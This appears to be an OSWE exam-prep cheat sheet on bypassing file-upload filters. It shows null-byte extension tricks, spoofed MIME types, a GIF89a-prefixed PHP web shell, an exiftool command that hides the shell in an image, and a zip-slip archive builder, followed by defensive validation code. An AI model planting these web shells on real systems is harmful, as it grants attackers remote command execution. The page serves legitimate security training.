AWAE - OSWE Preparation / Resources

Tricks

Null Byte

  • .php%00.gif
  • .php\x00.gif
  • .php%00.png
  • .php\x00.png
  • .php%00.jpg
  • .php\x00.jpg

Mime type

  • Content-Type: image/gif
  • Content-Type: image/png
  • Content-Type: image/jpeg

GIF89a;

GIF89a;
<?
system($_GET['cmd']);
?>

Inside image's content

exiftool -Comment='<?php system($_GET["cmd"]); ?>' photo.jpg

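Create ZIP manually (e.g. zipslip)

Using zipfile

from zipfile import ZipFile

# writestr(name, data): name is the entry name stored in the archive, data is the file body.
# "path" and "content" are placeholders.
with ZipFile("test.zip", "w") as archive:
    archive.writestr("path", "content")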
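
Seen from the receiving side, the tricks on this page map to a small set of server checks. The sketch below is an added example, not code from the original page; the function names, the extension policy and the reject messages are assumptions.

```python
import io
import os
import re
import zipfile

# Assumed policy for this sketch: allowed extension -> accepted leading magic bytes.
MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
}
# Heuristic only: can false-positive on large binaries. Re-encoding the image
# server-side is the robust way to drop embedded comments and trailing data.
SCRIPT_TAG = re.compile(rb"<\?(php|=|\s)", re.IGNORECASE)


def check_upload(filename, data):
    """Return a list of reasons to reject an upload (empty list = passed).

    The client-supplied Content-Type is deliberately not an input:
    the sender controls it, so it proves nothing about the content.
    """
    problems = []
    if "\x00" in filename or "%00" in filename:
        problems.append("null byte in filename")
    ext = os.path.splitext(filename.lower())[1]
    if ext not in MAGIC:
        problems.append("extension not allowed")
    elif not data.startswith(MAGIC[ext]):
        problems.append("magic bytes do not match extension")
    if SCRIPT_TAG.search(data):
        problems.append("script open tag in content")
    return problems


def unsafe_zip_entries(data, dest):
    """Return entry names that would be written outside dest if extracted."""
    root = os.path.realpath(dest)
    bad = []
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for name in archive.namelist():
            target = os.path.realpath(os.path.join(root, name))
            if os.path.commonpath([root, target]) != root:
                bad.append(name)
    return bad
```

Passing these checks is not a reason to keep the client's filename: store accepted files under a server-generated name, outside any directory where the web server executes scripts.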

Last updated 4 years ago
